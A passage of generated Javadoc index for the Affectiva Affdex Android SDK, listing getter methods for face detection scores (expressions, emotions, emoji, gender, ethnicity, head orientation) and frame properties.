<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectEngagement()">getDetectEngagement()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectEthnicity()">getDetectEthnicity()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectEyeClosure()">getDetectEyeClosure()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectEyeWiden()">getDetectEyeWiden()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectFear()">getDetectFear()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectGender()">getDetectGender()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectGlasses()">getDetectGlasses()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectInnerBrowRaise()">getDetectInnerBrowRaise()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectJawDrop()">getDetectJawDrop()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectJoy()">getDetectJoy()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectLidTighten()">getDetectLidTighten()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectLipCornerDepressor()">getDetectLipCornerDepressor()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectLipPress()">getDetectLipPress()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectLipPucker()">getDetectLipPucker()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectLipStretch()">getDetectLipStretch()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectLipSuck()">getDetectLipSuck()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectMouthOpen()">getDetectMouthOpen()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectNoseWrinkle()">getDetectNoseWrinkle()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectSadness()">getDetectSadness()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectSmile()">getDetectSmile()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectSmirk()">getDetectSmirk()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectSurprise()">getDetectSurprise()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectUpperLipRaise()">getDetectUpperLipRaise()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectValence()">getDetectValence()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getDimpler()">getDimpler()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Dimpler score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html#getDisappointed()">getDisappointed()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emojis</a></dt>
<dd>
<div class="block">Returns the score for 😞 (disappointed face).</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html#getDisgust()">getDisgust()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emotions</a></dt>
<dd>
<div class="block">Gets the Disgust score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html#getDominant()">getDominant()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emojis</a></dt>
<dd>
<div class="block">Returns the raw classifier score for the dominant emoji.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html#getDominantEmoji()">getDominantEmoji()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emojis</a></dt>
<dd>
<div class="block">Returns the most likely ("dominant") emoji.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html#getEngagement()">getEngagement()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emotions</a></dt>
<dd>
<div class="block">Gets the Engagement score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Appearance.html#getEthnicity()">getEthnicity()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Appearance.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Appearance</a></dt>
<dd>
<div class="block">Gets the ETHNICITY, an <a href="./com/affectiva/android/affdex/sdk/detector/Face.ETHNICITY.html" title="enum in com.affectiva.android.affdex.sdk.detector"><code>Face.ETHNICITY</code></a> enum.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getEyeClosure()">getEyeClosure()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Eye Closure score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getEyeWiden()">getEyeWiden()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Eye Widen score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.html#getFacePoints()">getFacePoints()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.html" title="class in com.affectiva.android.affdex.sdk.detector">Face</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html#getFear()">getFear()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emotions</a></dt>
<dd>
<div class="block">Gets the Fear score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html#getFlushed()">getFlushed()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emojis</a></dt>
<dd>
<div class="block">Returns the score for 😳 (flushed face).</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Appearance.html#getGender()">getGender()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Appearance.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Appearance</a></dt>
<dd>
<div class="block">Gets the Gender score, a <a href="./com/affectiva/android/affdex/sdk/detector/Face.GENDER.html" title="enum in com.affectiva.android.affdex.sdk.detector"><code>Face.GENDER</code></a> enum.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Appearance.html#getGlasses()">getGlasses()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Appearance.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Appearance</a></dt>
<dd>
<div class="block">Gets the Glasses score, a <a href="./com/affectiva/android/affdex/sdk/detector/Face.GLASSES.html" title="enum in com.affectiva.android.affdex.sdk.detector"><code>Face.GLASSES</code></a> enum.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.BitmapFrame.html#getHeight()">getHeight()</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.BitmapFrame.html" title="class in com.affectiva.android.affdex.sdk">Frame.BitmapFrame</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.ByteArrayFrame.html#getHeight()">getHeight()</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.ByteArrayFrame.html" title="class in com.affectiva.android.affdex.sdk">Frame.ByteArrayFrame</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.html#getHeight()">getHeight()</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk">Frame</a></dt>
<dd>
<div class="block">Get <code>Frame</code>'s height.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.html#getId()">getId()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.html" title="class in com.affectiva.android.affdex.sdk.detector">Face</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getInnerBrowRaise()">getInnerBrowRaise()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Inner Brow Raise score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Measurements.html#getInterocularDistance()">getInterocularDistance()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Measurements.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Measurements</a></dt>
<dd>
<div class="block">Gets the Interocular Distance, defined as the distance between the outer corner of each eye, measured in pixels.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getJawDrop()">getJawDrop()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Jaw Drop score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html#getJoy()">getJoy()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emotions</a></dt>
<dd>
<div class="block">Gets the Joy score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html#getKissing()">getKissing()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emojis</a></dt>
<dd>
<div class="block">Returns the score for 😗 (kissing face).</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html#getLaughing()">getLaughing()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emojis</a></dt>
<dd>
<div class="block">Returns the score for 😆 (smiling face with open mouth and tightly-closed eyes).</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getLidTighten()">getLidTighten()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Lid Tighten score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getLipCornerDepressor()">getLipCornerDepressor()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Lip Corner Depressor score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getLipPress()">getLipPress()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Lip Press score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getLipPucker()">getLipPucker()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Lip Pucker score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getLipStretch()">getLipStretch()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Lip Stretch score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getLipSuck()">getLipSuck()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Lip Suck score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getMouthOpen()">getMouthOpen()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Mouth Open score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getNoseWrinkle()">getNoseWrinkle()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Nose Wrinkle score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.html#getOriginalBitmapFrame()">getOriginalBitmapFrame()</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk">Frame</a></dt>
<dd>
<div class="block">Get the <code>Bitmap</code> that was used to create this frame, if any.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getPercentFaceDetected()">getPercentFaceDetected()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd>
<div class="block">The percentage of time that any face was detected (reset at every <a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#start()"><code>Detector.start()</code></a>, but not <a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#reset()"><code>Detector.reset()</code></a>).</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Measurements.Orientation.html#getPitch()">getPitch()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Measurements.Orientation.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Measurements.Orientation</a></dt>
<dd>
<div class="block">Gets the Pitch score, measured in degrees.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.html#getPixelCount()">getPixelCount()</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk">Frame</a></dt>
<dd>
<div class="block">Get total number of pixels in <code>Frame</code>.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html#getRage()">getRage()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emojis</a></dt>
<dd>
<div class="block">Returns the score for 😡 (pouting face).</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html#getRelaxed()">getRelaxed()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emojis</a></dt>
<dd>
<div class="block">Returns the score for ☺ (white smiling face).</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Measurements.Orientation.html#getRoll()">getRoll()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Measurements.Orientation.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Measurements.Orientation</a></dt>
<dd>
<div class="block">Gets the Roll score, measured in degrees.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html#getSadness()">getSadness()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emotions</a></dt>
<dd>
<div class="block">Gets the Sadness score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html#getScream()">getScream()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emojis</a></dt>
<dd>
<div class="block">Returns the score for 😱 (face screaming in fear).</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.EMOJI.html#getShortcode()">getShortcode()</a></span> - Method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.EMOJI.html" title="enum in com.affectiva.android.affdex.sdk.detector">Face.EMOJI</a></dt>
<dd>
<div class="block">Returns the markdown "shortcode" that represents this emoji, e.g.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getSmile()">getSmile()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Smile score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html#getSmiley()">getSmiley()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emojis</a></dt>
<dd>
<div class="block">Returns the score for 😃 (smiling face with open mouth).</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html#getSmirk()">getSmirk()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emojis</a></dt>
<dd>
<div class="block">Returns the score for 😏 (smirking face).</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getSmirk()">getSmirk()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Smirk score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html#getStuckOutTongue()">getStuckOutTongue()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emojis</a></dt>
<dd>
<div class="block">Returns the score for 😛 (face with stuck-out tongue).</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html#getStuckOutTongueWinkingEye()">getStuckOutTongueWinkingEye()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emojis</a></dt>
<dd>
<div class="block">Returns the score for 😜 (face with stuck-out tongue and winking eye).</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html#getSurprise()">getSurprise()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emotions</a></dt>
<dd>
<div class="block">Gets the Surprise score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.html#getTargetRotation()">getTargetRotation()</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk">Frame</a></dt>
<dd>
<div class="block">Get <code>Frame</code>'s rotation angle.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.EMOJI.html#getUnicode()">getUnicode()</a></span> - Method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.EMOJI.html" title="enum in com.affectiva.android.affdex.sdk.detector">Face.EMOJI</a></dt>
<dd>
<div class="block">Returns a String containing the character(s) needed to represent this emoji.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getUpperLipRaise()">getUpperLipRaise()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Upper Lip Raise score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html#getValence()">getValence()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emotions</a></dt>
<dd>
<div class="block">Gets the Valence score, a float in the range [-100,100].</div>
</dd>
